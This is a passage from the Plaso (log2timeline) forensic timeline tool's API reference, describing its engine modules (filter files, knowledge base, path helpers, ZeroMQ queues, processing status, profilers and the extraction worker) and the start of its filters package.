Filter file. class plaso.engine.filter_file.FilterFile Bases: object Filter file. A filter file contains one or more path filters. A path filter may contain path expansion attributes. Such an attribute is defined as anything within a curly bracket, for example “System{my_attribute}PathKeyname”. If the attribute “my_attribute” is defined its runtime value will be replaced with placeholder in the path filter such as “SystemMyValuePathKeyname”. If the path filter needs to have curly brackets in the path then these need to be escaped with another curlybracket, for example “System{my_attribute}{{123-AF25-E523}}KeyName”, where “{{123-AF25-E523}}” will be replaced with “{123-AF25-E523}” at runtime. ReadFromFile(path) Reads the path filters from the filter file. Parameters path (str) – path to a filter file. Returns path filters. Return type list[PathFilter] plaso.engine.filters_helper module

Collection filters helper. class plaso.engine.filters_helper.CollectionFiltersHelper Bases: object Helper for collection filters. excluded_file_system_find_specs file system find specifications of paths to exclude from the collection. Type list[dfvfs.FindSpec] included_file_system_find_specs file system find specifications of paths to include in the collection. Type list[dfvfs.FindSpec] registry_find_specs Windows Registry find specifications. Type list[dfwinreg.FindSpec]

130 Chapter 5. plaso package Plaso (log2timeline), Release 20210606 plaso.engine.knowledge_base module

The artifact knowledge base object. The knowledge base is filled by user provided input and the pre-processing phase. It is intended to provide successive phases, like the parsing and analysis phases, with essential information like the time zone and codepage of the source data. class plaso.engine.knowledge_base.KnowledgeBase Bases: object The knowledge base. AddAvailableTimeZone(time_zone, session_identifier=None) Adds an available time zone. Parameters • time_zone (TimeZoneArtifact) – time zone artifact. • session_identifier (Optional[str])) – session identifier, where None represents the active session. Raises KeyError – if the time zone already exists. AddEnvironmentVariable(environment_variable) Adds an environment variable. Parameters environment_variable (EnvironmentVariableArtifact) – environment variable artifact. Raises KeyError – if the environment variable already exists. AddUserAccount(user_account, session_identifier=None) Adds an user account. Parameters • user_account (UserAccountArtifact) – user account artifact. • session_identifier (Optional[str])) – session identifier, where None represents the active session. Raises KeyError – if the user account already exists. AddWindowsEventLogProvider(windows_eventlog_provider, session_identifier=None) Adds a Windows Event Log provider. Parameters • windows_eventlog_provider (WindowsEventLogProviderArtifact) – Windows Event Log provider. • session_identifier (Optional[str])) – session identifier, where None represents the active session. Raises KeyError – if the Windows Event Log provider already exists. GetEnvironmentVariable(name) Retrieves an environment variable. Parameters name (str) – name of the environment variable. Returns environment variable artifact or None if there was no value set for the given name.

5.1. Subpackages 131 Plaso (log2timeline), Release 20210606

Return type EnvironmentVariableArtifact GetEnvironmentVariables() Retrieves the environment variables. Returns environment variable artifacts. Return type list[EnvironmentVariableArtifact] GetHostname(session_identifier=None) Retrieves the hostname related to the event. If the hostname is not stored in the event it is determined based on the preprocessing information that is stored inside the storage file. Parameters session_identifier (Optional[str])) – session identifier, where None represents the active session. Returns hostname. Return type str GetMountPath() Retrieves the mount path of the source. Returns mount path of the source or None if not set. Return type str GetSourceConfigurationArtifacts(session_identifier=None) Retrieves the knowledge base as a source configuration artifacts. Parameters session_identifier (Optional[str])) – session identifier, where None represents the active session. Returns source configuration artifacts. Return type list[SourceConfigurationArtifact] GetTextPrepend() Retrieves the text to prepend to the display name. Returns text to prepend to the display name or None if not set. Return type str GetUsernameByIdentifier(user_identifier, session_identifier=None) Retrieves the username based on an user identifier. Parameters • user_identifier (str) – user identifier, either a UID or SID. • session_identifier (Optional[str])) – session identifier, where None represents the active session. Returns username. Return type str GetUsernameForPath(path) Retrieves a username for a specific path. This is determining if a specific path is within a user’s directory and returning the username of theuserif so. Parameters path (str) – path.

132 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

Returns username or None if the path does not appear to be within a user’s directory. Return type str GetValue(identifier, default_value=None) Retrieves a value by identifier. Parameters • identifier (str) – case insensitive unique identifier for the value. • default_value (object) – default value. Returns value or default value if not available. Return type object Raises TypeError – if the identifier is not a string type. HasUserAccounts() Determines if the knowledge base contains user accounts. Returns True if the knowledge base contains user accounts. Return type bool ReadSystemConfigurationArtifact(system_configuration, session_identifier=None) Reads the knowledge base values from a system configuration artifact. Note that this overwrites existing values in the knowledge base. Parameters • system_configuration (SystemConfigurationArtifact) – system configuration artifact. • session_identifier (Optional[str])) – session identifier, where None represents the active session. SetActiveSession(session_identifier) Sets the active session. Parameters session_identifier (str) – session identifier where None represents the default active session. SetCodepage(codepage) Sets the codepage. Parameters codepage (str) – codepage. Raises ValueError – if the codepage is not supported. SetEnvironmentVariable(environment_variable) Sets an environment variable. Parameters environment_variable (EnvironmentVariableArtifact) – environment variable artifact. SetHostname(hostname, session_identifier=None) Sets a hostname. Parameters • hostname (HostnameArtifact) – hostname artifact.

5.1. Subpackages 133 Plaso (log2timeline), Release 20210606

• session_identifier (Optional[str])) – session identifier, where None represents the active session. SetMountPath(mount_path) Sets the text to prepend to the display name. Parameters mount_path (str) – mount path of the source or None if the source is not a mounted onto a directory. SetTextPrepend(text_prepend) Sets the text to prepend to the display name. Parameters text_prepend (str) – text to prepend to the display name or None if no text should be prepended. SetTimeZone(time_zone) Sets the time zone. Parameters time_zone (str) – time zone. Raises ValueError – if the time zone is not supported. SetValue(identifier, value) Sets a value by identifier. Parameters • identifier (str) – case insensitive unique identifier for the value. • value (object) – value. Raises TypeError – if the identifier is not a string type. property available_time_zones available time zones of the current session. Type list[TimeZone] property codepage codepage of the current session. Type str property hostname hostname of the current session. Type str property timezone time zone of the current session. Type datetime.tzinfo property user_accounts user accounts of the current session. Type list[UserAccountArtifact] property year year of the current session. Type int

134 Chapter 5. plaso package Plaso (log2timeline), Release 20210606 plaso.engine.logger module

The engine sub module logger. plaso.engine.path_filters module

Path filters. Path filters are specified in filter files and are used during collection to include or exclude filesystempaths. class plaso.engine.path_filters.PathCollectionFiltersHelper Bases: plaso.engine.filters_helper.CollectionFiltersHelper Path collection filters helper. BuildFindSpecs(path_filters, environment_variables=None) Builds find specifications from path filters. Parameters • path_filters (list[PathFilter]) – path filters. • environment_variables (Optional[list[EnvironmentVariableArtifact]])– environment variables. class plaso.engine.path_filters.PathFilter(filter_type, description=None, path_separator='/', paths=None) Bases: object Path filter. description description of the purpose of the filter or None if not set. Type str filter_type indicates if the filter should include or excludes paths during collection. Type str path_separator path segment separator. Type str paths paths to filter. Type list[str] FILTER_TYPE_EXCLUDE = 'exclude' FILTER_TYPE_INCLUDE = 'include'

5.1. Subpackages 135 Plaso (log2timeline), Release 20210606 plaso.engine.path_helper module

The path helper. class plaso.engine.path_helper.PathHelper Bases: object Class that implements the path helper. classmethod ExpandGlobStars(path, path_separator) Expands globstars “**” in a path. A globstar “**” will recursively match all files and zero or more directories and subdirectories. By default the maximum recursion depth is 10 subdirectories, a numeric values after the globstar, such as “**5”, can be used to define the maximum recursion depth. Parameters • path (str) – path to be expanded. • path_separator (str) – path segment separator. Returns String path expanded for each glob. Return type list[str] classmethod ExpandUsersVariablePath(path, path_separator, user_accounts) Expands a path with a users variable, such as %%users.homedir%%. Parameters • path (str) – path with users variable. • path_separator (str) – path segment separator. • user_accounts (list[UserAccountArtifact]) – user accounts. Returns paths for which the users variables have been expanded. Return type list[str] classmethod ExpandWindowsPath(path, environment_variables) Expands a Windows path containing environment variables. Parameters • path (str) – Windows path with environment variables. • environment_variables (list[EnvironmentVariableArtifact]) – environment variables. Returns expanded Windows path. Return type str classmethod ExpandWindowsPathSegments(path_segments, environment_variables) Expands a Windows path segments containing environment variables. Parameters • path_segments (list[str]) – Windows path segments with environment variables. • environment_variables (list[EnvironmentVariableArtifact]) – environment variables. Returns expanded Windows path segments.

136 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

Return type list[str] classmethod GetDisplayNameForPathSpec(path_spec, mount_path=None, text_prepend=None) Retrieves the display name of a path specification. Parameters • path_spec (dfvfs.PathSpec) – path specification. • mount_path (Optional[str]) – path where the file system that is used by the path specification is mounted, such as “/mnt/image”. The mount path will be stripped fromthe absolute path defined by the path specification. • text_prepend (Optional[str]) – text to prepend. Returns human readable version of the path specification or None if no path specification was provided. Return type str classmethod GetRelativePathForPathSpec(path_spec, mount_path=None) Retrieves the relative path of a path specification. If a mount path is defined the path will be relative to the mount point, otherwise the path is relativetothe root of the file system that is used by the path specification. Parameters • path_spec (dfvfs.PathSpec) – path specification. • mount_path (Optional[str]) – path where the file system that is used by the path specification is mounted, such as “/mnt/image”. The mount path will be stripped fromthe absolute path defined by the path specification. Returns relative path or None. Return type str plaso.engine.plaso_queue module

Queue management implementation for Plaso. This file contains an implementation of a queue used by plaso for queue management. The queue has been abstracted in order to provide support for different implementations of the queueing mechanism, to support multi processing and scalability. class plaso.engine.plaso_queue.Queue Bases: object Class that implements the queue interface. abstract Close(abort=False) Closes the queue. Parameters abort (Optional[bool]) – whether the Close is the result of an abort condition. If True, queue contents may be lost. abstract IsEmpty() Determines if the queue is empty. abstract Open() Opens the queue, ready to enqueue or dequeue items.

5.1. Subpackages 137 Plaso (log2timeline), Release 20210606

abstract PopItem() Pops an item off the queue. Raises QueueEmpty – when the queue is empty. abstract PushItem(item, block=True) Pushes an item onto the queue. Parameters • item (object) – item to add. • block (bool) – whether to block if the queue is full. Raises QueueFull – if the queue is full, and the item could not be added. class plaso.engine.plaso_queue.QueueAbort Bases: object Class that implements a queue abort. plaso.engine.process_info module

Information about running process. class plaso.engine.process_info.ProcessInfo(pid) Bases: object Provides information about a running process. GetUsedMemory() Retrieves the amount of memory used by the process. Returns amount of memory in bytes used by the process or None if not available. Return type int plaso.engine.processing_status module

Processing status classes. class plaso.engine.processing_status.EventsStatus Bases: object The status of the events. number_of_duplicate_events number of duplicate events, not including the original. Type int number_of_events_from_time_slice number of events from time slice. Type int number_of_filtered_events number of events excluded by the event filter. Type int

138 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

number_of_macb_grouped_events number of events grouped based on MACB. Type int total_number_of_events total number of events in the storage file. Type int class plaso.engine.processing_status.ProcessStatus Bases: object The status of an individual process. display_name human readable of the file entry currently being processed by the process. Type str identifier process identifier. Type str last_running_time timestamp of the last update when the process had a running process status. Type int number_of_consumed_event_tags total number of event tags consumed by the process. Type int number_of_consumed_event_tags_delta number of event tags consumed by the process since the last status update. Type int number_of_consumed_events total number of events consumed by the process. Type int number_of_consumed_events_delta number of events consumed by the process since the last status update. Type int number_of_consumed_reports total number of event reports consumed by the process. Type int number_of_consumed_reports_delta number of event reports consumed by the process since the last status update. Type int number_of_consumed_sources total number of event sources consumed by the process. Type int number_of_consumed_sources_delta number of event sources consumed by the process since the last status update.

5.1. Subpackages 139 Plaso (log2timeline), Release 20210606

Type int number_of_consumed_extraction_warnings total number of extraction warnings consumed by the process. Type int number_of_consumed_extraction_warnings_delta number of extraction warnings consumed by the process since the last status update. Type int number_of_produced_event_tags total number of event tags produced by the process. Type int number_of_produced_event_tags_delta number of event tags produced by the process since the last status update. Type int number_of_produced_events total number of events produced by the process. Type int number_of_produced_events_delta number of events produced by the process since the last status update. Type int number_of_produced_reports total number of event reports produced by the process. Type int number_of_produced_reports_delta number of event reports produced by the process since the last status update. Type int number_of_produced_sources total number of event sources produced by the process. Type int number_of_produced_sources_delta number of event sources produced by the process since the last status update. Type int number_of_produced_extraction_warnings total number of extraction warnings produced by the process. Type int number_of_produced_extraction_warnings_delta number of extraction warnings produced by the process since the last status update. Type int pid process identifier (PID). Type int

140 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

status human readable status indication such as “Hashing” or “Idle”. Type str used_memory size of used memory in bytes. Type int UpdateNumberOfEventReports(number_of_consumed_reports, number_of_produced_reports) Updates the number of event reports. Parameters • number_of_consumed_reports (int) – total number of event reports consumed by the process. • number_of_produced_reports (int) – total number of event reports produced by the process. Returns True if either number of event reports has increased. Return type bool Raises ValueError – if the consumed or produced number of event reports is smaller than the value of the previous update. UpdateNumberOfEventSources(number_of_consumed_sources, number_of_produced_sources) Updates the number of event sources. Parameters • number_of_consumed_sources (int) – total number of event sources consumed by the process. • number_of_produced_sources (int) – total number of event sources produced by the process. Returns True if either number of event sources has increased. Return type bool Raises ValueError – if the consumed or produced number of event sources is smaller than the value of the previous update. UpdateNumberOfEventTags(number_of_consumed_event_tags, number_of_produced_event_tags) Updates the number of event tags. Parameters • number_of_consumed_event_tags (int) – total number of event tags consumed by the process. • number_of_produced_event_tags (int) – total number of event tags produced by the process. Returns True if either number of event tags has increased. Return type bool Raises ValueError – if the consumed or produced number of event tags is smaller than the value of the previous update. UpdateNumberOfEvents(number_of_consumed_events, number_of_produced_events) Updates the number of events.

5.1. Subpackages 141 Plaso (log2timeline), Release 20210606

Parameters • number_of_consumed_events (int) – total number of events consumed by the process. • number_of_produced_events (int) – total number of events produced by the process. Returns True if either number of events has increased. Return type bool Raises ValueError – if the consumed or produced number of events is smaller than the value of the previous update. UpdateNumberOfExtractionWarnings(number_of_consumed_warnings, number_of_produced_warnings) Updates the number of extraction warnings. Parameters • number_of_consumed_warnings (int) – total number of extraction warnings consumed by the process. • number_of_produced_warnings (int) – total number of extraction warnings produced by the process. Returns True if either number of extraction warnings has increased. Return type bool Raises ValueError – if the consumed or produced number of extraction warnings is smaller than the value of the previous update. class plaso.engine.processing_status.ProcessingStatus Bases: object The status of the overall extraction process (processing). aborted True if processing was aborted. Type bool error_path_specs path specifications that caused critical errors during processing. Type list[dfvfs.PathSpec] events_status status information about events. Type EventsStatus foreman_status foreman processing status. Type ProcessingStatus start_time time that the processing was started. Contains the number of micro seconds since January 1, 1970, 00:00:00 UTC. Type float tasks_status status information about tasks. Type TasksStatus

142 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

UpdateEventsStatus(events_status) Updates the events status. Parameters events_status (EventsStatus) – status information about events. UpdateForemanStatus(identifier, status, pid, used_memory, display_name, number_of_consumed_sources, number_of_produced_sources, number_of_consumed_events, number_of_produced_events, number_of_consumed_event_tags, number_of_produced_event_tags, number_of_consumed_reports, number_of_produced_reports, number_of_consumed_warnings, number_of_produced_warnings) Updates the status of the foreman. Parameters • identifier (str) – foreman identifier. • status (str) – human readable status indication such as “Hashing” or “Idle”. • pid (int) – process identifier (PID). • used_memory (int) – size of used memory in bytes. • display_name (str) – human readable of the file entry currently being processed bythe foreman. • number_of_consumed_sources (int) – total number of event sources consumed by the foreman. • number_of_produced_sources (int) – total number of event sources produced by the foreman. • number_of_consumed_events (int) – total number of events consumed by the foreman. • number_of_produced_events (int) – total number of events produced by the foreman. • number_of_consumed_event_tags (int) – total number of event tags consumed by the foreman. • number_of_produced_event_tags (int) – total number of event tags produced by the foreman. • number_of_consumed_warnings (int) – total number of warnings consumed by the foreman. • number_of_produced_warnings (int) – total number of warnings produced by the foreman. • number_of_consumed_reports (int) – total number of event reports consumed by the process. • number_of_produced_reports (int) – total number of event reports produced by the process. UpdateTasksStatus(tasks_status) Updates the tasks status. Parameters tasks_status (TasksStatus) – status information about tasks.

5.1. Subpackages 143 Plaso (log2timeline), Release 20210606

UpdateWorkerStatus(identifier, status, pid, used_memory, display_name, number_of_consumed_sources, number_of_produced_sources, number_of_consumed_events, number_of_produced_events, number_of_consumed_event_tags, number_of_produced_event_tags, number_of_consumed_reports, number_of_produced_reports, number_of_consumed_warnings, number_of_produced_warnings) Updates the status of a worker. Parameters • identifier (str) – worker identifier. • status (str) – human readable status indication such as “Hashing” or “Idle”. • pid (int) – process identifier (PID). • used_memory (int) – size of used memory in bytes. • display_name (str) – human readable of the file entry currently being processed bythe worker. • number_of_consumed_sources (int) – total number of event sources consumed by the worker. • number_of_produced_sources (int) – total number of event sources produced by the worker. • number_of_consumed_events (int) – total number of events consumed by the worker. • number_of_produced_events (int) – total number of events produced by the worker. • number_of_consumed_event_tags (int) – total number of event tags consumed by the worker. • number_of_produced_event_tags (int) – total number of event tags produced by the worker. • number_of_consumed_reports (int) – total number of event reports consumed by the process. • number_of_produced_reports (int) – total number of event reports produced by the process. • number_of_consumed_warnings (int) – total number of warnings consumed by the worker. • number_of_produced_warnings (int) – total number of warnings produced by the worker. property workers_status The worker status objects sorted by identifier. class plaso.engine.processing_status.TasksStatus Bases: object The status of the tasks. number_of_abandoned_tasks number of abandoned tasks. Type int number_of_queued_tasks number of active tasks.

144 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

Type int number_of_tasks_pending_merge number of tasks pending merge. Type int number_of_tasks_processing number of tasks processing. Type int total_number_of_tasks total number of tasks. Type int plaso.engine.profilers module

The profiler classes. class plaso.engine.profilers.AnalyzersProfiler(identifier, configuration) Bases: plaso.engine.profilers.CPUTimeProfiler The analyzers profiler. class plaso.engine.profilers.CPUTimeMeasurement Bases: object The CPU time measurement. start_sample_time start sample time or None if not set. Type float total_cpu_time total CPU time or None if not set. Type float SampleStart() Starts measuring the CPU time. SampleStop() Stops measuring the CPU time. class plaso.engine.profilers.CPUTimeProfiler(identifier, configuration) Bases: plaso.engine.profilers.SampleFileProfiler The CPU time profiler. StartTiming(profile_name) Starts timing CPU time. Parameters profile_name (str) – name of the profile to sample. StopTiming(profile_name) Stops timing CPU time. Parameters profile_name (str) – name of the profile to sample.

5.1. Subpackages 145 Plaso (log2timeline), Release 20210606 class plaso.engine.profilers.MemoryProfiler(identifier, configuration) Bases: plaso.engine.profilers.SampleFileProfiler The memory profiler. Sample(profile_name, used_memory) Takes a sample for profiling. Parameters • profile_name (str) – name of the profile to sample. • used_memory (int) – amount of used memory in bytes. class plaso.engine.profilers.ProcessingProfiler(identifier, configuration) Bases: plaso.engine.profilers.CPUTimeProfiler The processing profiler. class plaso.engine.profilers.SampleFileProfiler(identifier, configuration) Bases: object Shared functionality for sample file-based profilers. classmethod IsSupported() Determines if the profiler is supported. Returns True if the profiler is supported. Return type bool Start() Starts the profiler. Stop() Stops the profiler. class plaso.engine.profilers.SerializersProfiler(identifier, configuration) Bases: plaso.engine.profilers.CPUTimeProfiler The serializers profiler. class plaso.engine.profilers.StorageProfiler(identifier, configuration) Bases: plaso.engine.profilers.SampleFileProfiler The storage profiler. Sample(profile_name, operation, description, data_size, compressed_data_size) Takes a sample of data read or written for profiling. Parameters • profile_name (str) – name of the profile to sample. • operation (str) – operation, either ‘read’ or ‘write’. • description (str) – description of the data read. • data_size (int) – size of the data read in bytes. • compressed_data_size (int) – size of the compressed data read in bytes. StartTiming(profile_name) Starts timing CPU time. Parameters profile_name (str) – name of the profile to sample.

146 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

StopTiming(profile_name) Stops timing CPU time. Parameters profile_name (str) – name of the profile to sample. class plaso.engine.profilers.TaskQueueProfiler(identifier, configuration) Bases: plaso.engine.profilers.SampleFileProfiler The task queue profiler. Sample(tasks_status) Takes a sample of the status of queued tasks for profiling. Parameters tasks_status (TasksStatus) – status information about tasks. class plaso.engine.profilers.TasksProfiler(identifier, configuration) Bases: plaso.engine.profilers.SampleFileProfiler The tasks profiler. Sample(task, status) Takes a sample of the status of a task for profiling. Parameters • task (Task) – a task. • status (str) – status.

plaso.engine.tagging_file module

Tagging file. class plaso.engine.tagging_file.TaggingFile(path) Bases: object Tagging file that defines one or more event tagging rules. GetEventTaggingRules() Retrieves the event tagging rules from the tagging file. Returns tagging rules, that consists of one or more filter objects per label. Return type dict[str, EventObjectFilter] Raises TaggingFileError – if a filter expression cannot be compiled.

plaso.engine.worker module

The event extraction worker. class plaso.engine.worker.EventExtractionWorker(force_parser=False, parser_filter_expression=None) Bases: object Event extraction worker. The event extraction worker determines which parsers are suitable for parsing a particular file entry or data stream. The parsers extract relevant data from file system and or file content data. All extracted data ispassedto the parser mediator for further processing. last_activity_timestamp timestamp received that indicates the last time activity was observed.

5.1. Subpackages 147 Plaso (log2timeline), Release 20210606

Type int processing_status human readable status indication such as: ‘Extracting’, ‘Hashing’. Type str GetAnalyzerNames() Gets the names of the active analyzers. Returns names of active analyzers. Return type list[str] ProcessPathSpec(mediator, path_spec, excluded_find_specs=None) Processes a path specification. Parameters • mediator (ParserMediator) – mediates the interactions between parsers and other components, such as storage and abort signals. • path_spec (dfvfs.PathSpec) – path specification. • excluded_find_specs (Optional[list[dfvfs.FindSpec]]) – find specifications that are excluded from processing. SetAnalyzersProfiler(analyzers_profiler) Sets the analyzers profiler. Parameters analyzers_profiler (AnalyzersProfiler) – analyzers profile. SetExtractionConfiguration(configuration) Sets the extraction configuration settings. Parameters configuration (ExtractionConfiguration) – extraction configuration. SetProcessingProfiler(processing_profiler) Sets the processing profiler. Parameters processing_profiler (ProcessingProfiler) – processing profile. SignalAbort() Signals the extraction worker to abort. plaso.engine.yaml_filter_file module

YAML-based filter file. class plaso.engine.yaml_filter_file.YAMLFilterFile Bases: object YAML-based filter file. A YAML-based filter file contains one or more path filters. description: Include filter with Linux paths.type: include path_separator: ‘/’ paths: - ‘/usr/bin’ Where: * description, is an optional description of the purpose of the path filter; * type, defines the filter type, which can be “include” or “exclude”; * path_separator, defines the path segment separator, which is “/” by default; * paths, defines regular expression of paths to filter on. Note that the regular expression need to be defined per path segment, for example to filter “/usr/bin/echo” and “/usr/sbin/echo” the following expression could be defined “/usr/(bin|sbin)/echo”.

148 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

Note that when the path segment separator is defined as “" it needs to be escaped as “\”, since “" is used bythe regular expression as escape character. A path may contain path expansion attributes, for example: %{SystemRoot}\System32 ReadFromFile(path) Reads the path filters from the YAML-based filter file. Parameters path (str) – path to a filter file. Returns path filters. Return type list[PathFilter]

plaso.engine.zeromq_queue module

ZeroMQ implementations of the Plaso queue interface. class plaso.engine.zeromq_queue.ZeroMQBufferedQueue(buffer_timeout_seconds=2, buffer_max_size=10000, delay_open=True, linger_seconds=10, maximum_items=1000, name='Unnamed', port=None, timeout_seconds=5) Bases: plaso.engine.zeromq_queue.ZeroMQQueue Parent class for buffered Plaso queues. Buffered queues use a regular Python queue to store items that are pushed or popped from the queuewithout blocking on underlying ZeroMQ operations. This class should not be instantiated directly, a subclass should be instantiated instead. Close(abort=False) Closes the queue. Parameters abort (Optional[bool]) – whether the Close is the result of an abort condition. If True, queue contents may be lost. Raises • QueueAlreadyClosed – if the queue is not started, or has already been closed. • RuntimeError – if closed or terminate event is missing. Empty() Removes all items from the internal buffer. class plaso.engine.zeromq_queue.ZeroMQBufferedReplyBindQueue(buffer_timeout_seconds=2, buffer_max_size=10000, delay_open=True, linger_seconds=10, maximum_items=1000, name='Unnamed', port=None, timeout_seconds=5) Bases: plaso.engine.zeromq_queue.ZeroMQBufferedReplyQueue A Plaso queue backed by a ZeroMQ REP socket that binds to a port. This queue may only be used to pop items, not to push. SOCKET_CONNECTION_TYPE = 1

5.1. Subpackages 149 Plaso (log2timeline), Release 20210606

class plaso.engine.zeromq_queue.ZeroMQBufferedReplyQueue(buffer_timeout_seconds=2, buffer_max_size=10000, delay_open=True, linger_seconds=10, maximum_items=1000, name='Unnamed', port=None, timeout_seconds=5) Bases: plaso.engine.zeromq_queue.ZeroMQBufferedQueue Parent class for buffered Plaso queues backed by ZeroMQ REP sockets. This class should not be instantiated directly, a subclass should be instantiated instead. Instances of this class or subclasses may only be used to push items, not to pop. PopItem() Pops an item of the queue. Provided for compatibility with the API, but doesn’t actually work. Raises WrongQueueType – As Pop is not supported by this queue. PushItem(item, block=True) Push an item on to the queue. If no ZeroMQ socket has been created, one will be created the first time this method is called. Parameters • item (object) – item to push on the queue. • block (Optional[bool]) – whether the push should be performed in blocking or non- blocking mode. Raises • QueueAlreadyClosed – if the queue is closed. • QueueFull – if the internal buffer was full and it was not possible to push the item tothe buffer within the timeout. • RuntimeError – if closed event is missing. class plaso.engine.zeromq_queue.ZeroMQPullConnectQueue(delay_open=True, linger_seconds=10, maximum_items=1000, name='Unnamed', port=None, timeout_seconds=5) Bases: plaso.engine.zeromq_queue.ZeroMQPullQueue A Plaso queue backed by a ZeroMQ PULL socket that connects to a port. This queue may only be used to pop items, not to push. SOCKET_CONNECTION_TYPE = 2 class plaso.engine.zeromq_queue.ZeroMQPullQueue(delay_open=True, linger_seconds=10, maximum_items=1000, name='Unnamed', port=None, timeout_seconds=5) Bases: plaso.engine.zeromq_queue.ZeroMQQueue Parent class for Plaso queues backed by ZeroMQ PULL sockets. This class should not be instantiated directly, a subclass should be instantiated instead. Instances of this class or subclasses may only be used to pop items, not to push. PopItem() Pops an item off the queue.

150 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

If no ZeroMQ socket has been created, one will be created the first time this method is called. Returns item from the queue. Return type object Raises • KeyboardInterrupt – if the process is sent a KeyboardInterrupt while popping an item. • QueueEmpty – if the queue is empty, and no item could be popped within the queue timeout. • RuntimeError – if closed or terminate event is missing. • zmq.error.ZMQError – if a ZeroMQ error occurs. PushItem(item, block=True) Pushes an item on to the queue. Provided for compatibility with the API, but doesn’t actually work. Parameters • item (object) – item to push on the queue. • block (Optional[bool]) – whether the push should be performed in blocking or non- blocking mode. Raises WrongQueueType – As Push is not supported this queue. class plaso.engine.zeromq_queue.ZeroMQPushBindQueue(delay_open=True, linger_seconds=10, maximum_items=1000, name='Unnamed', port=None, timeout_seconds=5) Bases: plaso.engine.zeromq_queue.ZeroMQPushQueue A Plaso queue backed by a ZeroMQ PUSH socket that binds to a port. This queue may only be used to push items, not to pop. SOCKET_CONNECTION_TYPE = 1 class plaso.engine.zeromq_queue.ZeroMQPushQueue(delay_open=True, linger_seconds=10, maximum_items=1000, name='Unnamed', port=None, timeout_seconds=5) Bases: plaso.engine.zeromq_queue.ZeroMQQueue Parent class for Plaso queues backed by ZeroMQ PUSH sockets. This class should not be instantiated directly, a subclass should be instantiated instead. Instances of this class or subclasses may only be used to push items, not to pop. PopItem() Pops an item of the queue. Provided for compatibility with the API, but doesn’t actually work. Raises WrongQueueType – As Pull is not supported this queue. PushItem(item, block=True) Push an item on to the queue. If no ZeroMQ socket has been created, one will be created the first time this method is called. Parameters • item (object) – item to push on the queue.

5.1. Subpackages 151 Plaso (log2timeline), Release 20210606

• block (Optional[bool]) – whether the push should be performed in blocking or non- blocking mode. Raises • KeyboardInterrupt – if the process is sent a KeyboardInterrupt while pushing an item. • QueueFull – if it was not possible to push the item to the queue within the timeout. • RuntimeError – if terminate event is missing. • zmq.error.ZMQError – if a ZeroMQ specific error occurs. class plaso.engine.zeromq_queue.ZeroMQQueue(delay_open=True, linger_seconds=10, maximum_items=1000, name='Unnamed', port=None, timeout_seconds=5) Bases: plaso.engine.plaso_queue.Queue Interface for a ZeroMQ backed queue. name name to identify the queue. Type str port TCP port that the queue is connected or bound to. If the queue is not yet bound or connected to a port, this value will be None. Type int timeout_seconds number of seconds that calls to PopItem and PushItem may block for, before returning queue.QueueEmpty. Type int Close(abort=False) Closes the queue. Parameters abort (Optional[bool]) – whether the Close is the result of an abort condition. If True, queue contents may be lost. Raises • QueueAlreadyClosed – if the queue is not started, or has already been closed. • RuntimeError – if closed or terminate event is missing. IsBound() Checks if the queue is bound to a port. IsConnected() Checks if the queue is connected to a port. IsEmpty() Checks if the queue is empty. ZeroMQ queues don’t have a concept of “empty” - there could always be messages on the queue that a producer or consumer is unaware of. Thus, the queue is never empty, so we return False. Note that it is possible that a queue is unable to pop an item from a queue within a timeout, which will cause PopItem to raise a QueueEmpty exception, but this is a different condition. Returns False, to indicate the the queue isn’t empty. Return type bool

152 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

Open() Opens this queue, causing the creation of a ZeroMQ socket. Raises QueueAlreadyStarted – if the queue is already started, and a socket already exists. abstract PopItem() Pops an item off the queue. Returns item from the queue. Return type object Raises QueueEmpty – if the queue is empty, and no item could be popped within the queue timeout. abstract PushItem(item, block=True) Pushes an item on to the queue. Parameters • item (object) – item to push on the queue. • block (Optional[bool]) – whether the push should be performed in blocking or non- blocking mode. Raises QueueAlreadyClosed – if the queue is closed. SOCKET_CONNECTION_BIND = 1 SOCKET_CONNECTION_CONNECT = 2 SOCKET_CONNECTION_TYPE = None class plaso.engine.zeromq_queue.ZeroMQRequestConnectQueue(delay_open=True, linger_seconds=10, maximum_items=1000, name='Unnamed', port=None, timeout_seconds=5) Bases: plaso.engine.zeromq_queue.ZeroMQRequestQueue A Plaso queue backed by a ZeroMQ REQ socket that connects to a port. This queue may only be used to pop items, not to push. SOCKET_CONNECTION_TYPE = 2 class plaso.engine.zeromq_queue.ZeroMQRequestQueue(delay_open=True, linger_seconds=10, maximum_items=1000, name='Unnamed', port=None, timeout_seconds=5) Bases: plaso.engine.zeromq_queue.ZeroMQQueue Parent class for Plaso queues backed by ZeroMQ REQ sockets. This class should not be instantiated directly, a subclass should be instantiated instead. Instances of this class or subclasses may only be used to pop items, not to push. PopItem() Pops an item off the queue. If no ZeroMQ socket has been created, one will be created the first time this method is called. Returns item from the queue. Return type object Raises

5.1. Subpackages 153 Plaso (log2timeline), Release 20210606

• KeyboardInterrupt – if the process is sent a KeyboardInterrupt while popping an item. • QueueEmpty – if the queue is empty, and no item could be popped within the queue timeout. • RuntimeError – if terminate event is missing. • zmq.error.ZMQError – if an error occurs in ZeroMQ. PushItem(item, block=True) Pushes an item on to the queue. Provided for compatibility with the API, but doesn’t actually work. Parameters • item (object) – item to push on the queue. • block (Optional[bool]) – whether the push should be performed in blocking or non- blocking mode. Raises WrongQueueType – As Push is not supported this queue.

Module contents

5.1.6 plaso.filters package

Submodules plaso.filters.event_filter module

The event filter. class plaso.filters.event_filter.EventObjectFilter Bases: object Event filter. CompileFilter(filter_expression) Compiles the filter expression. The filter expression contains an object filter expression. Parameters filter_expression (str) – filter expression. Raises ParseError – if the filter expression cannot be parsed. Match(event, event_data, event_data_stream, event_tag) Determines if an event matches the filter. Parameters • event (EventObject) – event. • event_data (EventData) – event data. • event_data_stream (EventDataStream) – event data stream. • event_tag (EventTag) – event tag. Returns True if the event matches the filter, False otherwise. Return type bool

154 Chapter 5. plaso package Plaso (log2timeline), Release 20210606 plaso.filters.expression_parser module

